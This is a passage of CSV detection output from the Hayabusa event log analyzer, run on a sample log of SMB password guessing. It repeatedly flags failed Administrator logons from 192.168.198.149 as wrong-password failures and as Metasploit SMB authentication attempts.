Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 